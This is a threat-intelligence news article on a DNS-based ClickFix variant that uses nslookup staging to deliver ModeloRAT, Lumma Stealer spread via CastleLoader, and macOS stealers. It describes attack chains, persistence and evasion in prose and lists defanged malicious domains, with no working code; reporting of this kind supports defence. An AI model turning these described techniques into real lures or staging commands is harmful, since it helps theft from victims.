Microsoft has revealed a new evolution of the ClickFix social engineering technique, where attackers manipulate users into executing commands that initiate a Domain Name System (DNS) lookup to fetch a secondary malicious payload.
In this updated approach, threat actors use the “nslookup” command—short for nameserver lookup—triggered through the Windows Run dialog. The command performs a custom DNS query that retrieves instructions for the next stage of the attack.
ClickFix has gained traction in recent years and is commonly distributed through phishing emails, malvertising campaigns, and drive-by download schemes. Victims are typically redirected to fraudulent landing pages featuring fake CAPTCHA checks or fabricated system alerts, urging them to run commands in the Windows Run dialog or the macOS Terminal app to “resolve” non-existent issues.
The technique has spread rapidly over the past two years because it relies on users unknowingly infecting their own systems, effectively bypassing traditional security safeguards. Its success has led to multiple offshoots, including FileFix, JackFix, ConsentFix, CrashFix, and GlitchFix.
"In the latest DNS-based staging using ClickFix, the initial command runs through cmd.exe and performs a DNS lookup against a hard-coded external DNS server, rather than the system's default resolver," the Microsoft Threat Intelligence team said in a series of posts on X. "The output is filtered to extract the Name: DNS response, which is executed as the second-stage payload."
Microsoft explained that this variation uses DNS as a “lightweight staging or signaling channel,” allowing attackers to communicate with their infrastructure while introducing an additional validation layer before delivering the next payload.
"Using DNS in this way reduces dependency on traditional web requests and can help blend malicious activity into normal network traffic," the Windows maker added.
Following the DNS lookup, the attack chain downloads a ZIP archive from an external server (“azwsappdev[.]com”). Inside is a malicious Python script that conducts system reconnaissance, executes discovery commands, and drops a Visual Basic Script (VBScript). That VBScript launches ModeloRAT—a Python-based remote access trojan previously linked to CrashFix campaigns.
To maintain persistence, the malware creates a Windows shortcut (LNK) file in the Startup folder, ensuring automatic execution whenever the system reboots.
Lumma Stealer and CastleLoader Activity Intensifies
Separately, Bitdefender has reported a spike in Lumma Stealer operations, fueled by ClickFix-style fake CAPTCHA campaigns. These attacks deploy an AutoIt-based version of CastleLoader, a loader attributed to a threat actor known as GrayBravo (formerly TAG-150).
CastleLoader checks for virtualization environments and certain security software before decrypting and executing the stealer in memory. Beyond ClickFix tactics, attackers are also using websites offering cracked software and pirated movies to lure victims into downloading malicious installers disguised as MP4 files.
Additional campaigns have delivered a counterfeit NSIS installer that runs obfuscated VBA scripts before launching AutoIt components responsible for loading Lumma Stealer. The VBA component establishes scheduled tasks to ensure persistence.
"Despite significant law enforcement disruption efforts in 2025, Lumma Stealer operations continued, demonstrating resilience by rapidly migrating to new hosting providers and adapting alternative loaders and delivery techniques," the Romanian cybersecurity company said. "At the core of many of these campaigns is CastleLoader, which plays a central role in helping LummaStealer spread through delivery chains."
One domain tied to CastleLoader infrastructure (“testdomain123123[.]shop”) was also identified as a Lumma Stealer command-and-control (C2) server, suggesting possible collaboration or shared services between operators. India has recorded the highest number of Lumma infections, followed by France, the U.S., Spain, Germany, Brazil, Mexico, Romania, Italy, and Canada.
"The effectiveness of ClickFix lies in its abuse of procedural trust rather than technical vulnerabilities," Bitdefender said. "The instructions resemble troubleshooting steps or verification workarounds that users may have encountered previously. As a result, victims often fail to recognize that they are manually executing arbitrary code on their own system."
Expanding Threat Landscape: RenEngine, macOS Stealers, and Malvertising
CastleLoader is not the only distribution mechanism in play. Since March 2025, campaigns using RenEngine Loader have spread Lumma Stealer through fake game cheats and pirated applications such as CorelDRAW. In these cases, RenEngine deploys Hijack Loader, which then installs the stealer. Kaspersky data shows primary impact in Russia, Brazil, Turkey, Spain, Germany, Mexico, Algeria, Egypt, Italy, and France.
Meanwhile, macOS users are increasingly being targeted. A campaign leveraging phishing and malvertising techniques has distributed Odyssey Stealer—a rebranded version of Poseidon Stealer and a fork of Atomic macOS Stealer (AMOS). The malware steals credentials and cryptocurrency wallet data from over 200 browser wallet extensions and multiple desktop wallet apps.
"Beyond credential theft, Odyssey operates as a full remote access trojan," Censys said. "A persistent LaunchDaemon polls the C2 every 60 seconds for commands, supporting arbitrary shell execution, reinfection, and a SOCKS5 proxy for tunneling traffic through victim machines."
Other campaigns include:
- Fake CAPTCHA pages on compromised websites tricking Windows users into running PowerShell commands that deploy StealC.
- Email phishing attacks using malicious SVG files inside password-protected ZIP archives to deliver the open-source .NET stealer Stealerium.
- Abuse of generative AI platforms such as Claude to host ClickFix instructions distributed via sponsored Google search results.
- Fake Medium articles impersonating Apple’s Support Team to spread macOS stealers via domains like “raxelpak[.]com.”
"The C2 domain raxelpak[.]com has URL history going back to 2021, when it appeared to host a safety workwear e-commerce site," MacPaw's Moonlock Lab said. "Whether the domain was hijacked or simply expired and re-registered by the [threat actor] is unclear, but it fits the broader pattern of leveraging aged domains with existing reputation to avoid detection."
Malvertising abuse has also raised concerns. "The ad shows a real, recognized domain (claude.ai), not a spoof or typo-squatted site," AdGuard said. "Clicking the ad leads to a real Claude page, not a phishing copy. The consequence is clear: Google Ads + a well-known trusted platform + technical users with high downstream impact = a potent malware distribution vector."
macOS Threats on the Rise
Security researchers note a broader shift toward targeting Apple systems with advanced infostealers. According to recent analysis, macOS stealers now target more than 100 Chrome cryptocurrency extensions, and attackers are even acquiring legitimate Apple developer signatures to bypass Gatekeeper protections.
"Nearly every macOS stealer prioritizes cryptocurrency theft above all else," the company said. "This laser focus reflects economic reality. Cryptocurrency users disproportionately use Macs. They often hold significant value in software wallets. Unlike bank accounts, crypto transactions are irreversible. Once seed phrases are compromised, funds disappear permanently with no recourse."
"The 'Macs don't get viruses' assumption is not just outdated but actively dangerous. Organizations with Mac users need detection capabilities for macOS-specific TTPs: unsigned applications requesting passwords, unusual Terminal activity, connections to blockchain nodes for non-financial purposes, and data exfiltration patterns targeting Keychain and browser storage."
